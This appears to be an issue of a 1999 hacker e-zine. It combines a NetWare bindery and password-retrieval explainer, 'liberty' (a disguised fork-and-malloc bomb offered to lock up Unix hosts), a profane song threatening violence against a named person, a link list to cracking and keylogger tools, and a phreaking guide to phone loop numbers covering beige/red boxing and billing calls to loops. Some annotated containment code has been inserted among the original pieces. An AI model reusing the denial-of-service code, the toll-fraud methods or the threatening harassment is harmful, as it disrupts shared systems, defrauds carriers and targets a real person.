ScanBinderyObject() can be used to retrieve data for more than one object
at a time, but will probably end up screwing things up if you try it. The
object name argument can contain wildcards (* or ?), and the object type
may be passed as OT_WILD. An object name of * and an object type of
OT_WILD means return every object in the bindery, which will also screw
you up. Because of this, GetObjectData() returns a pointer to an array of
OBJECT structures. The last element is a dummy with all fields cleared to
0. NWS then uses GetUserAndApplicationData() to retrieve the password.

The bindery is a database where NetWare keeps information about the
network resources and users that many function groups use to store and
retrieve information. Each file server on a network system has its own
bindery, and thus its own group of known objects.

The bindery represents objects using object IDs, which are
system-generated long (four-byte) integers. NetWare stores them in
high-low order. The object ID serves as a handle to object information.

The object type identifies the role the object plays in the network
environment. Novell reserves type numbers up to 0x8000 for well-known
types. Each object may in turn possess identifying characteristics, known
as properties. Properties can either be items, which are stored as
128-byte segments of unformatted data, or sets, which are lists of object
IDs. Properties are either static or dynamic, and have read/write security
protection. Properties have these attributes:

The property name is a character string of up to 16 characters, including
the null terminator. Property names have the same restrictions on use of
characters as object names.

The property flags are stored as a one-byte field. They indicate whether
the property is static or dynamic, and whether it is an item or a set.
Item properties are unformatted binary fields stored in 128-byte segments
which are interpreted by applications or NetWare APIs. Sets are lists of
object IDs; these are interpreted by NetWare.

The property security plays the same role for properties as for objects.
The values flag indicates whether the property has been assigned a value.

Properties are dependent on objects, which have these attributes:

OBJECT ID
OBJECT NAME
OBJECT TYPE
OBJECT FLAG
OBJECT SECURITY
PROPERTIES FLAG

There are two ways of identifying objects. You can use the OBJECT ID or
the OBJECT NAME and OBJECT TYPE.

These are the property attributes:

OBJECT ID
PROPERTY NAME
PROPERTY FLAGS
PROPERTY SECURITY
VALUES FLAG

NetWare stores items and sets as 128-byte segments of binary data. With
item data, a segment contains anything an application wants it to; with
set data, a segment holds 32 object IDs. An item property can only be
represented as a variable-length binary, or RAW, column. The only other
column that we need is the object ID, so we know who the property belongs
to.

The structure of the set property table becomes clear if we think about what
it represents. For example, the properties GROUPS_I'M_IN and GROUP_MEMBERS
are used by NetWare to track group membership. A user object may belong to
any number of groups. A user group object may contain any number of users.
These properties express a relationship of the OBJECTS table with itself.

PASSWORD is of type item, and would be structured thus:

OBJECT ID
SEGMENTS
DATA

A set property is just an array of OBJECT_IDs. With both item properties
and set properties, we don't know how many segments we will retrieve, so
we declare pointers to the values, which we will allocate memory for.
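
To make the set layout concrete, here is an added example (not part of NetWare Sniffer or of the NetWare SDK) that decodes a set property spread over several 128-byte segments into host-order object IDs. The function names and sample IDs are constructed, and treating an all-zero slot as empty is an assumption.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define SEGMENT_SIZE    128
#define IDS_PER_SEGMENT (SEGMENT_SIZE / 4)   /* 32 four-byte object IDs per segment */

/* Read one object ID stored in high-low order (most significant byte first). */
static uint32_t id_from_hilo(const unsigned char *p)
{
    return ((uint32_t)p[0] << 24) | ((uint32_t)p[1] << 16) |
           ((uint32_t)p[2] << 8)  |  (uint32_t)p[3];
}

/* Store one object ID in high-low order. */
static void id_to_hilo(uint32_t id, unsigned char *p)
{
    p[0] = (unsigned char)(id >> 24);
    p[1] = (unsigned char)(id >> 16);
    p[2] = (unsigned char)(id >> 8);
    p[3] = (unsigned char)id;
}

/* Decode a set property made of nseg consecutive segments. Member IDs are
 * written to out[] in host byte order. Returns the number of members, or -1
 * if out[] (cap entries) is too small. Zero slots are skipped as empty
 * (assumption). */
int decode_set(const unsigned char *segs, size_t nseg, uint32_t *out, size_t cap)
{
    size_t n = 0;
    for (size_t s = 0; s < nseg; s++) {
        for (size_t i = 0; i < IDS_PER_SEGMENT; i++) {
            uint32_t id = id_from_hilo(segs + s * SEGMENT_SIZE + i * 4);
            if (id == 0) continue;
            if (n == cap) return -1;
            out[n++] = id;
        }
    }
    return (int)n;
}

/* Constructed sample: a group with 33 members needs two segments. The first
 * is full (IDs 0x0A000001..0x0A000020), the second holds one ID and padding. */
void build_sample(unsigned char segs[2 * SEGMENT_SIZE])
{
    memset(segs, 0, 2 * SEGMENT_SIZE);
    for (uint32_t i = 0; i < IDS_PER_SEGMENT; i++)
        id_to_hilo(0x0A000001u + i, segs + i * 4);
    id_to_hilo(0x0B000001u, segs + SEGMENT_SIZE);
}

int main(void)
{
    unsigned char segs[2 * SEGMENT_SIZE];
    uint32_t ids[2 * IDS_PER_SEGMENT];
    build_sample(segs);
    int n = decode_set(segs, 2, ids, 2 * IDS_PER_SEGMENT);
    printf("%d members, first %08lX, last %08lX\n", n,
           (unsigned long)ids[0], (unsigned long)ids[n - 1]);
    return 0;
}
```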

------------------------------ begin here ------------------------------

/* structs.h */

#define MSC 510
#define LINT_ARGS 
/* netware's prolog.h still thinks it's working with microsoft c 4.0 */

#include <prolog.h>
#include <nit.h>
#include <niterror.h>
#include <nxt.h>

#ifndef TRUE
#define TRUE 1
#endif

#ifndef FALSE
#define FALSE 0
#endif

#define FORWARD extern
#define LOCAL static
#define GLOBAL

#define MAX_OBJECT_NAME_LENGTH 48
#define MAX_PROPERTY_NAME_LENGTH 16
#define SEGMENT_SIZE 128
#define MAX_DIRECTORY_LENGTH 255

#define OT_APPLICATION 0x8001 /* our new object type */

typedef long OBJECT_ID; /* this has to go here */

#define OBJECTS_PER_SEGMENT (SEGMENT_SIZE / sizeof (OBJECT_ID))

typedef int BOOL;
typedef BYTE SEGMENT[SEGMENT_SIZE];
typedef struct _OBJECT_
{
char szObjectName[MAX_OBJECT_NAME_LENGTH];
WORD wObjectType;
OBJECT_ID oid;
BYTE byObjectFlag;
BYTE byObjectSecurity;
BYTE byPropertiesFlag;
} OBJECT;

typedef struct _ITEM_PROPERTY_
{
int nSegments;
BYTE *pValue;
} ITEM_PROPERTY;

typedef struct _PROPERTY_
{
char szPropertyName[MAX_PROPERTY_NAME_LENGTH];
BYTE byPropertyFlags;
BYTE byPropertySecurity;
BYTE byValuesFlag;
union
{
ITEM_PROPERTY iProperty;
OBJECT_ID *pObjectList;
} uPropertyValue;
} PROPERTY;

typedef struct _OBJECT_INFO_
{
OBJECT obj;
PROPERTY *pObjectProperties; /* array of unknown size */
} OBJECT_INFO;

typedef struct _APPLICATION_OBJECT_
{
OBJECT obj;
char szPassword[SEGMENT_SIZE];
WORD wMaximumUsers;
char szApplicationDirectory[2 * SEGMENT_SIZE];
OBJECT_ID *pAllowedUsers;
OBJECT_ID *pCurrentUsers;
} APPLICATION_OBJECT;

typedef char SERVER_NAME[MAX_OBJECT_NAME_LENGTH];

typedef struct _WS_CONNECTION_
{
BYTE byInUseFlag;
BYTE byOrderNumber;
BYTE byNetworkNumber[4];
BYTE byNodeAddress[6];
BYTE bySocketNumber[2];
BYTE byReceiveTimeOut[3];
BYTE byRoutingNode[6];
BYTE byPacketSequenceNumber;
BYTE byConnectionNumber;
BYTE byConnectionStatus;
BYTE byMaximumTimeOut[2];
BYTE byPadding[5];
} WS_CONNECTION;

typedef struct _WS_TABLE
{
SERVER_NAME szServerName;
WS_CONNECTION wsc;
} WS_TABLE;

typedef struct _FS_CONNECTION_
{
WORD wConnectionNumber;
IPXAddress StationAddress;
BYTE byRoutingNode[6];
} FS_CONNECTION;

typedef struct _NW_DATE_AND_TIME_
{
BYTE byYear; /* 0 to 99; less than 80 is in the 21st century */
	     /* yes I do realize that when we hit 2000 my program */
	     /* will screw up and stuff */
BYTE byMonth;
BYTE byDay;
BYTE byHour;
BYTE byMinute;
BYTE bySecond;
BYTE byDayOfWeek; /* 0 to 6, 0 is sunday */
} NW_DATE_AND_TIME;

typedef struct _FS_LOGGED_OBJECT_
{
WORD wConnectionNumber;
OBJECT obj;
NW_DATE_AND_TIME nwdtLoginTime;
} FS_LOGGED_OBJECT;

typedef struct _FS_CONNECTION_INFO_
{
FS_CONNECTION fsConnection;
FS_LOGGED_OBJECT fsLoggedObject;
} FS_CONNECTION_INFO;

#include "blahblah.dec"

------------------------------- end here -------------------------------

------------------------------ begin here ------------------------------

/* 
 * blahblah.dec - this thing's gonna be used for other stuff I write too
 */

/* gotta have all o' this stuff to define the types, and also
for use in a program that will be in a later kv issue */

extern void AddApplication(void );
extern void AllowedUsers(int nAction);
extern int BinderyCheckCode(int nCompletionCode);
extern int CheckObject(OBJECT *pObject, char *pszObjectPassword);
extern int CheckCommandLineArgs(char * *argv, int argc, int nMaxArgs);
extern int CountCurrentUsers(APPLICATION_OBJECT *aop);
extern void CurrentUsers(void );
extern void DeleteApplication(void );
extern int DeleteObject(OBJECT *pObject);
extern int DeleteObjectProperty(OBJECT *pObject, PROPERTY *pProperty);
extern OBJECT *DestroyObject(OBJECT *pObject);
extern PROPERTY *DestroyObjectProperty(PROPERTY *pProperty, unsigned short wProperties);
extern int GetApplication(APPLICATION_OBJECT *aop);
extern int GetUserAndAppInfo(char * *argv, int nMaxArgs, OBJECT *pObject, APPLICATION_OBJECT *aop);
extern int GetItemOrSet(OBJECT *pObject, PROPERTY *pProperty);
extern OBJECT *GetObjectData(char *pszObjectName, unsigned short wObjectType);
extern OBJECT_INFO *GetAllObjectInfo(char *pszObjectName, unsigned short wObjectType);
extern PROPERTY *GetObjectPropertyData(OBJECT *pObject, char *pszPropertyName);
extern int IsUserAllowed(OBJECT *pObject, APPLICATION_OBJECT *aop);
extern int IsUsingApplication(OBJECT *pObject, APPLICATION_OBJECT *aop);
extern int IsValidName(char *pszObjectName, unsigned short wMaxLength);
extern void KillNewLine(char *pszString);
extern void ListUsers(APPLICATION_OBJECT *aop, int nUserType);
extern int LinkObjectsInSet(OBJECT *pOwner, OBJECT *pMember, char *pszSetName);
extern int RetrieveApplicationData(APPLICATION_OBJECT *aop);
extern int SetItemProperty(OBJECT *pObject, PROPERTY *pProperty);
extern int SetObjectData(OBJECT *pObject);
extern int SetObjectPropertyData(OBJECT *pObject, PROPERTY *pProperty);
extern int RemoveObjectFromSet(OBJECT *pOwner, OBJECT *pMember, char *pszSetName);
extern void UpdateApplication(void );
extern int WriteAppDirectory(APPLICATION_OBJECT *aop);

extern FS_CONNECTION_INFO *GetConnInfo(unsigned short wConnectionNumber);
extern FS_CONNECTION_INFO *GetObjectConnInfo(OBJECT *pObject);
extern WS_TABLE *GetWSTables(void );
extern void VerifyLoginStatus(APPLICATION_OBJECT *aop);

extern int DirCheckCode(int nCompletionCode);

extern void DeleteApplication(void );

extern int CountCurrentUsers(APPLICATION_OBJECT *aop);

------------------------------- end here -------------------------------

kv[11]; /*Liberty............................................guidob */


/*
	liberty - this will fill up all available swap and memory
		  if no ulimit is set in the kernel, most unix systems
		  that is, it works on all unix systems with local access
		  (at least, the ones i tried)
		  no more activity is possible after a few seconds this is
		  activated. - guidob
*/

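#include <stdio.h>
#include <stdlib.h>   /* malloc(), exit() */
#include <string.h>   /* strcpy() */
#include <unistd.h>   /* fork() */

#define BUF 4096

int do_malloc(int buf);   /* defined below main() */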

int main(int argc, char *argv[]) {
        strcpy(argv[0], "man telnet\0");
        printf("funky malloc() fork() weirdness\n");
	printf("by guidob and CoolVibe\n");
        do_malloc(BUF);
        exit(0);
}

int do_malloc(int buf) {
        fprintf(stderr, "Doing %d bytes of funky malloc() weirdness\n", buf);
	printf("put this in the background and logout ;)");
        if(fork()) {
                while(1) {
                        fork();
                        malloc(buf);
                }
        }
}
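
The header comment above says the program only works "if no ulimit is set". As an added example (not part of the original issue), this shows that limit doing its job: a child process is capped with setrlimit() and then allocates 4096-byte blocks until malloc() is refused. The function names, the 16 MiB cap and the 32 MiB self-imposed ceiling are constructed for the demonstration.

```c
#include <stdio.h>
#include <stdlib.h>
#include <sys/resource.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

#define CHUNK     4096                     /* same block size as BUF in liberty.c */
#define TRY_BYTES (32L * 1024 * 1024)      /* the child stops by itself after 32 MiB */

static void *volatile head;                /* keeps every block reachable */

/* Apply the caps a shell's ulimit would set; 0 means "leave as inherited".
 * RLIMIT_AS bounds the address space, so malloc() starts returning NULL.
 * RLIMIT_NPROC bounds fork(); it is counted per real user ID and is not
 * enforced for privileged processes. */
static int apply_limits(rlim_t as_bytes, rlim_t nproc)
{
    struct rlimit rl;
    if (as_bytes) {
        rl.rlim_cur = rl.rlim_max = as_bytes;
        if (setrlimit(RLIMIT_AS, &rl) != 0) return -1;
    }
    if (nproc) {
        rl.rlim_cur = rl.rlim_max = nproc;
        if (setrlimit(RLIMIT_NPROC, &rl) != 0) return -1;
    }
    return 0;
}

/* Fork a child, cap it, and let it allocate CHUNK-sized blocks the way
 * do_malloc() does (without the fork loop). Returns the number of bytes the
 * child obtained before malloc() failed or TRY_BYTES was reached, -1 on error. */
long contained_alloc(rlim_t as_bytes, rlim_t nproc)
{
    int fd[2];
    long got = -1;
    int status;
    pid_t pid;

    if (pipe(fd) != 0) return -1;
    pid = fork();
    if (pid < 0) { close(fd[0]); close(fd[1]); return -1; }

    if (pid == 0) {                        /* child: the process being contained */
        long mine = 0;
        close(fd[0]);
        if (apply_limits(as_bytes, nproc) != 0) _exit(2);
        while (mine < TRY_BYTES) {
            void **p = malloc(CHUNK);
            if (p == NULL) break;          /* limit reached: allocation refused */
            *p = head;                     /* chain the blocks so none is optimised away */
            head = p;
            mine += CHUNK;
        }
        if (write(fd[1], &mine, sizeof mine) != (ssize_t)sizeof mine) _exit(3);
        _exit(0);
    }

    close(fd[1]);                          /* parent: collect the child's count */
    if (read(fd[0], &got, sizeof got) != (ssize_t)sizeof got) got = -1;
    close(fd[0]);
    waitpid(pid, &status, 0);
    return got;
}

int main(void)
{
    printf("capped at 16 MiB: child got %ld bytes\n",
           contained_alloc(16UL * 1024 * 1024, 0));
    printf("no cap:           child got %ld bytes\n", contained_alloc(0, 0));
    return 0;
}
```

On a multi-user system the same caps are normally applied at login (for example through the shell's ulimit or PAM limits), so every process a user starts inherits them.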

			 [-------------------------------------]

kv[12]; /* Rootfest '99 Review.................................lothos */


kv[13]; /* Ode to JP.......................................krankshaft */

Ode to JP

(sang to the tune of "Ode to My Car, by Adam Sandler")

written by KrankShaft of Legions of the Underground
loved by everyone

Here we go...

Piece of shit media whore
I know a piece of shit whore
That fuckin' sellout
Won't get very far

He's a big piece of shit
He's bound to get fucking shot
JP's going to get broken
I'll tie him in a knot
(He's a piece of shit)

I can't see why he does it
He must be smoking crack
And he smells real bad
Everyone thinks he's really wack
(He's a piece of shit)


Piece of shit media whore
(He's a piece of shit whore)
He sucks royal dick
That fuckin' pile of shit
100% crap
No he won't get very far
Fuck you whore

He's got no friends, and his site is totally jacked
Whoever likes him can lick my sweaty nuck sack
(They can bite my ass too)
And he's got no fucking skills
He'd give anyone a blow
Just to hear them say, "I want to be like you, asshole"
(You fuckin piece of shit)

(Piece of shit media whore)
I know a piece of shit whore
(JP's a piece of shit whore)
I told him to suck my ass
(That fuckin pile of shit)
That pile of sold-out shit
(He never gets very far)

Oh now what the fuck did he do
What the fuck did he do
What the fuck did he do
To get in the news
You're going to be black and blue
Don't even try to sue
You better try something new
Oh fuck JP

Well he lies like a fucking rug
JP always fucking stalls
And he's gonna get a fat lip
And a swift kick to the balls
(Ouch ouch ouch)
Plus he tries to get everyone busted
I had to run to a fucking hangar
(He's a pain in my ass)
And if a girlie ever see's this whore
There's no chance he'll ever bang her
(He never ever gets da pussy)
JP shut up
(Piece of shit whore)
You piece of shit whore

(I know a piece of shit media whore)
You piece of shit whore
(Piece of shit whore)
And you call us liars
(You're a piece of shit whore)
Look in the fucking mirror
(Piece of shit whore)
You'll be seven different colors
(You piece of shit media whore)
Fucking crowbar into your lap
(Piece of shit whore)
You'll be puking eve-ry-where
(You're a piece of shit whore)
(Piece of shit whore)
(You're a piece of shit whore)
(Piece of shit whore)
The whole world thinks your a loser
(You're a piece of shit whore)
Maybe I'll give you a push
(Piece of shit whore...)
			 [-------------------------------------]

kv[13]; /* Top WWW Sites......................................ntwak0 */
   
LOU Fast Handy Links
NtWaK0 June 06, 1999

   Hello to all my brothers and sisters -;).
   
   This time I decided to make something different and handy that can help
   everyone, a novice or an ereet person. After years of experience in the
   computing field I did find out that if we have nice organized
   idea/file/links/whatever/you/want, well we do our job better and
   faster and with less stress >>less Coffee.
   
   So I decided to put out a nice list that contains security information.
   
   I will be keeping this up-to-date and the plan is to have a nice small
   HTML format file that can be used anywhere you go, just dump it on
   diskette or whatever you like.
      
   Sorry for the list, I wished I could make it bigger but I had time
   restrictions. Let IT GROW. ;)
   
   I could make the links in different files, but I wanted to have
   something in one file. So your suggestions are more than welcome.
   
   Shout-out to all LOU members /friends.
   
    1. Security
    2. Tools
    3. Search
    4. News
       
   
Security

     * Information
       
          + http://csrc.nist.gov/secpubs/rainbow
          + Canadian gov information
            http://csrc.nist.gov/nistpubs/cc/
          + Electronically OK!
            http://eok.net/
          + http://gandalf.isu.edu/security/security.html
          + firewall-wizards messages
            http://www.nfr.net/firewall-wizards/
          + http://www.iss.net/xforce/
          + CIAC Bulletins
            http://ciac.llnl.gov/ciac/
          + Tips of the month
            http://199.44.114.223/rharri/tips.htm
          + http://www.warforge.com/
          + NT security
            http://www.txdirect.net/users/wall/ntlinks.htm
          + http://www.fedz.net/
          + http://www.daxion.demon.co.uk/
          + http://www.infilsec.com/
          + http://gandalf.isu.edu/
          + http://www.nfr.net/
          + http://www.iss.net/xforce/
          + Security Links UNIX NT etc...
            http://www.ntsecurity.net/scripts/loader.asp?iD=/security/ntresources.htm
          + Computers Security information
            http://www.alw.nih.gov/Security/security.html
          + COAST Hotlist kudos
            http://www.cs.purdue.edu/coast/hotlist/
          + Computer Security Resource Clearinghouse
            http://csrc.ncsl.nist.gov/
          + Computer Incident Advisory Capability
            http://ciac.llnl.gov/
          + NT FAQ
            http://www.ntfaq.com/
          + NT Download Zdnet Site
            http://www.zdnet.com/windows/nt/security/ntbugtraq/
          + http://www.trustedsystems.com/
          + http://www.infowar.com/
          + http://www.securezone.com/
          + Computers Consulting Links
            http://www.ahandyguide.com/cat1/c/c1305.htm
          + http://www.ntresearch.com/
          + NT Admin Tools
            http://www.ntadmintools.com/
          + New dimension security Training
            http://www.newdimensions.net
            
          + Statistics
            
               o http://nic.merit.edu:/nsfnet/statistics/
               o http://www.hack.gr/cgi-bin/webstats
               o Get a live Internet Traffic Report
                 http://www.internettrafficreport.com/
               o Web Statistics
                 http://www.hack.gr/cgi-bin/webstats
               o Crime Security Systems
                 http://www.crime-freesecurity.com/
                 
          + Unix
            
               o http://www.users.fast.net/
               o http://w56.ml.org/
                 
     * App
       
          + WatchDog Software (unix)
            http://www.infstream.com/
          + Reporting Software
            http://www.notify.com/audit.htm
          + Netsuite Professional Audit Software
            http://www.netsuite.com/cgi/template.pl/site/products/index.html
          + NDG Software's
            http://www.comsecltd.com/archive/ndgfile.html
          + aelita enterprise suite
            http://www.ntsecurity.com/Products/index.html
          + SeNTry - the Enterprise Event Manager
            http://www.missioncritical.com/product/list.htm
          + The MerzScope Sampler
            http://www.merzcom.com/prod/scop/sampler.html
          + Hackershield
            https://secure.interlog.com/netect/hsblform.htm
          + T-sight
            http://www.engarde.com/software/t-sight/index.html
          + NTManage v2.08
            http://www.lanware.net/download/
          + Forensic and Security Software
            http://www.secure-data.com/tools.html
          + Site Manager Software
            http://194.87.208.92/product/bay/network/site.htm
          + RealSecure Software
            http://www.iss.net/prod/rs.html
          + Shadoware - Real-Time Network Security Monitoring
            http://www.intrusion.com
          + Kane Security Analyst Software
            http://www.intrusion.com/product.htm
   
Tools

     * Vulnerability Track
       
          + http://www.ntsecurity.net/
            È See document: http://www.ntsecurity.net/
            
          + http://www.geek-girl.com/bugtraq/search.html
            È See document: http://www.geek-girl.com/bugtraq/search.html
            
          + http://www.cert.org/
            È See document: http://www.cert.org/
            
          + http://www.insecure.org/
            È See document: http://www.insecure.org/
            
          + http://www.iss.net/xforce/
            È See document: http://www.iss.net/xforce/
            
          + Exploit Track
            È See document: http://www.geek-girl.com/bugtraq/search.html
            
          + Vulnerability engine
            È See document:
            http://www.infilsec.com/cgi-infilsec/if?action=search?
            
     * Crackz
       
          + http://bmh.underboss.com/cracks.html
            È See document: http://bmh.underboss.com/cracks.html
            
     * Registry
       
          + NT Registry Hack
            È See document: http://www.jsiinc.com/reghack.htm
            
          + Registry Tips Very Good
            È See document:
            http://www.regedit.com/Security/Restrictions_and_Policies/
            
          + Win 95 Reg Hack
            È See document:
            http://www.cnet.com/Content/Features/Howto/Hacks/index.html
            
     * OnLine Tools
       
          + Hacker Home Page
            » See document: http://www.cyberarmy.com/

          + Nice search for Hackers
            » See document: http://ww2.hitbox.com/

          + Get NT user and Group List Using IE
            » See document: http://209.146.229.2/NTSecurity/default.asp

          + FTP Fast
            » See document: http://ftpsearch.ntnu.no/

          + Find People anywhere
            » See document: http://www.worldpages.com/reshome.html/

          + Get a social number USA
            » See document: http://kadima.com/

          + World Page
            » See document: http://www.worldpages.com

          + Search for Any domain
            » See document: http://www.alldomains.com/

          + Whois Server

               o telnet://whois.internic.net/

               o telnet://nic.ddn.mil 43

          + Word list all lang
            » See document: ftp://sable.ox.ac.uk/pub/wordlists

          + Nameserver Lookup
            » See document: http://jos.net/projects/nslookup4WWW/nslookup4WWW.html
            
     * List 1
       
          + http://www.fortrex.com/trn_hacker_tools.htm

          + Windows NT Web Server Tools
            » See document: http://www.interlacken.com/winnt/ntwebsrv.htm

          + Information Security Resource
            » See document: http://www.sabernet.net/

          + Script page
            » See document: http://worldwidemart.com/scripts/

          + http://www.hackersclub.com/km/library

          + http://www.apbonline.com/gfiles/

          + http://www.jabukie.com/

          + Hackers Hall Of Fame
            » See document: http://eagle2.online.discovery.com/area/technology/hackers/hackers.html

          + http://www.thecodex.com/hacking.html

          + http://www.sysone.demon.co.uk/newhack.htm

          + http://www.bikkel.com/~demoniz/

          + Team 2600 MAC Hacking
            » See document: http://cyberpunkz.com/team2600/products.html

          + Stealth Keyboard Interceptor
            » See document: http://www.fortunecity.com/skyscraper/cache/426/key_log.html

          + Snadboy's Revelation
            » See document: http://www.snadboy.com/Revelation.shtml

          + SATAN Unix
            » See document: http://www.cs.ruu.nl/cert-uu/satan.html

          + L0pht Crack
            » See document: http://www.l0pht.com/l0phtcrack/

          + IP Spoofing
            » See document: http://ryanspc.com/ipspoof.html

          + Trojan Like Bo
            » See document: http://hax0r.to/deept/

          + Back Orifice
            » See document: http://www.cultdeadcow.com/tools/

          + Collection of hacking CDROM
            » See document: http://www.hackershomepage.com/section7.htm

          + Hacking CD
            » See document: http://members.xoom.com/hackingcd/smallcd.htm

          + Hacker Gold CDROM
            » See document: http://www.hackerscatalog.com/hackgold.htm

          + Hackershield
            » See document: https://secure.interlog.com/netect/hsblform.htm
            
          + http://ds.dial.pipex.com/legends/

          + United Hackers Association
            » See document: http://205.237.55.207/

          + http://www.hackcanada.com/

          + http://rhino9.ml.org/

          + http://www.genocide2600.com/~tattooman/ADM/

          + http://www.insecure.org/nmap/

          + http://bewoner.dma.be/clan/

          + Linux Project Personal Page Check Often
            » See document: http://www.cri.cz/kra/index.html

          + Hacking NT Tools
            » See document: http://www.kull.ch/Bauersachs/cracknt_e.asp

          + tHe w1ck3d k1nGs
            » See document: http://members.xoom.com/SOSSEC/frames.html

          + The United Council
            » See document: http://www.unitedcouncil.org/

          + Hacking Tools & Virus
            » See document: http://home.bip.net/ttorp/enter.html

          + Hacker Club
            » See document: http://hackersclub.com/km/files/

          + Hide Away
            » See document: http://www.hideaway.net/

          + http://underground.org

          + http://www.phrack.com

          + http://www.subz3ro.com/

          + 901 check in the future
            » See document: http://www.901.org/files.html

          + Good site must check often
            » See document: http://www.fortunecity.com/skyscraper/quantum/488/KiNdReD.html

          + Check Often Phreak and Hack
            » See document: http://www.johnhead.demon.nl/frames.htm

          + WebFringe Hacker Web Links
            » See document: http://www.webfringe.com/top100/?progen

          + Microsoft hack files
            » See document: ftp://ftp.technotronic.com/microsoft/

          + http://www.2600.com/beyondhope/

          + http://www.brd.ie/papers/
            
          + Magazine
            2600
            Underground Informer
            
          + Unix
            http://www.squirrel.com/squirrel/index.html
            http://www.users.fast.net/
            
     * List 2
       
          + http://www.chez.com/rekcah/

          + http://www.altern.org/snem1/frames/

          + http://www.hackersntrackers.com/

          + http://membres.tripod.fr/Hackito/Newtaz.html

          + Active Matrix's Hideaway
            » See document: http://www.hideaway.net/

          + http://www.clic.net/~hello/puppet/
            
     * Exploits and Search
       
          + http://www.geek-girl.com/bugtraq/search.html

          + http://www.genocide2600.com/~tattooman/index.shtml

          + http://www.pulhas.org/exploits/

          + http://www.hackcity.com/

          + http://www.real-secure.org/security/exploits/

          + http://www.antioffline.com/

          + http://www.macroshaft.org/noie.html

          + http://www.securitysearch.net/

          + http://adm.freelsd.net/

          + http://www.undersec.com/

          + http://www.raza-mexicana.org

          + http://www.arctik.com

          + http://personales.mundivia.es/sneaker

          + http://homocyberian.cjb.net

          + http://719.cjb.net

          + http://www.sekure.org/english/index.html

          + http://www.cybermedia.co.in/hotnews.htm

          + http://www.securiteam.com/

          + http://www.ntsecurity.net/

          + http://www.networkcommand.com/

          + http://www.attrition.org/errata/

          + http://www.ciac.org/

          + http://www.eeye.com/index.html

          + http://www.alternetive.asso.fr/securite/securiteSoft.htm

          + http://www.insecure.org/

          + http://www.iss.net/xforce/

          + http://www.infilsec.com/cgi-infilsec/if?action=search?

          + http://www.nmrc.org/

          + http://www.technotronic.com/

          + http://www.cookiecentral.com/
            
   
Search

     * Altavista
       » See document: http://altavista.digital.com/

     * Altavista Translator
       » See document: http://babelfish.altavista.digital.com/

     * HotBot
       » See document: http://hotbot.com

     * DogPile
       » See document: http://www.dogpile.com/

     * 12 Search Engine In One
       » See document: http://www.800go.com/800go.html

     * Deja News
       » See document: http://www.dejanews.com/

     * Handilinks
       » See document: http://www.handilinks.com/

     * Find People Kadima
       » See document: http://kadima.com/

     * World Yellow Pages
       » See document: http://www.worldpages.com/reshome.html/

     * World Yellow Pages
       » See document: http://www.worldpages.com

     * http://www.800go.com/800go.html

     * Support Microsoft
       » See document: http://support.microsoft.com/support/search/c.asp?

     * Security Search Engine
       » See document: http://www.securitysearch.net/

     * Country

          + Canada 411
            » See document: http://canada411.sympatico.ca/index.html

          + St-Bruno
            » See document: http://www.pageweb.qc.ca/st-bruno/default.htm
            
   
News

     * http://www.hackernews.com/

     * http://www.infowar.com/hacker/hacker.html-ssi

     * Hacked Site Archives of hacked sites
       » See document: http://www.onething.com/archive/

     * New Dimension archive hacked
       » See document: http://www.newdimensions.net/hacktrash.htm

     * AntiOnline archive of hacked
       » See document: http://www.antionline.com/archives/pages/

     * http://www.wired.com/

     * http://innerpulse.com/

     * www.innerpulsewwwboard.com
       » See document: http://www.innerpulsewwwboard.com

     * http://www.innerpulsehacks.com

     * News Group

          + news://alt.security

          + news://comp.security.announce

          + List of Security List Servers
            » See document: ListServer.htm

     * Magazine

          + Virus 40HEX
            » See document: http://www.eff.org/pub/Publications/CuD/

          + Safer Magazine
            » See document: http://www.siamrelay.com/

     * Dokumentation des Chaos
       » See document: http://presse.ccc.de/

     * http://www.sans.org/digest.htm

			 [-------------------------------------]      
kv[14]; /* Intro to Loops.....................................hitman */

$Intro.$
        
Loop numbers can be found in all area codes and are made up primarily of
two phone numbers which are usually consecutive.

ex:
        
201-376-9929      201-376-9930         

(actual working loop number in NJ)

The two numbers are connected and have a constant on-hook voltage. If you
called the lower number and your buddy phreak called the higher number you
would be instantly connected! Sorta like a conference table (which mah boy
error explains in an issue of A9F4). Anyway, you will know you are on one
of the two if you either hear silence or a loud tone (100hz). This is the
low number (through dozens of tests); if you hear a low beep then you are
on the higher number.


$The Fun Begins...$

I know by now you are wondering what the hell you need a loop number for
or how to find one, for if not you wouldn't be reading this txt. Having a
loop number is one of the numbero uno things a field phreak can have next
to a beige/red box. It can offer even more anonymity while talking on the
phone.

For example, you can either beige box your neighbor's TNI or beige box the
splice box around the corner and dial one of the numbers and talk to your
waiting friend, and/or red box a payphone and dial, etc. This is one of the
greatest things to have if you want to talk to someone other than an at&t
conference number.
        
You can also place charges on the loop. Say for instance you get on a conf.
or maybe the operator asks where should you place the charges. Have your
friend be on the loop and tell her the number. Maybe not a good idea but
wtf.

It is very simple but painstakingly hard to scan for loops. One of my
tricks is to enter one of your town's/city's normal prefixes and then add
99xx/99xX. I got around 5 or 6 out of probably 20 attempts. I'm not too
sure of the risks of scanning for loops, plus Bell hasn't mailed me
anything yet so I guess it's okay. Just don't be dialing all day. Do a few
at a time. Just dial three or four random numbers per day and you can make
up a wrong number or "me no speak no english" story.


$In the End...$
        
Loop numbers can be very fun and useful to anyone who wants the extra
stealth when talking about upcoming projects or meetings and such. But
it also has its drawbacks, like trying to find loop numbers. So I decided
to put a few loop numbers in here from a few NPAs around the country.
Some may work and some may not.

That's life, dig it.

*****Loop List*****

California

213-360-1118   $    213-365-1118
213-360-1119   $    213-365-1119  

Florida

305-964-9951   $    305-778-9952
305-778-9951   $    305-964-9952


Michigan

313-731-9996   $    313-722-9996      
313-731-9997   $    313-722-9997

New Jersey
201-558-9929   $    201-992-9929      
201-558-9930   $    201-992-9930

*****Loop List*****


[----------thats all folks-------]
http://www.underzine.com - An LoU joint.....  [www.legions.org]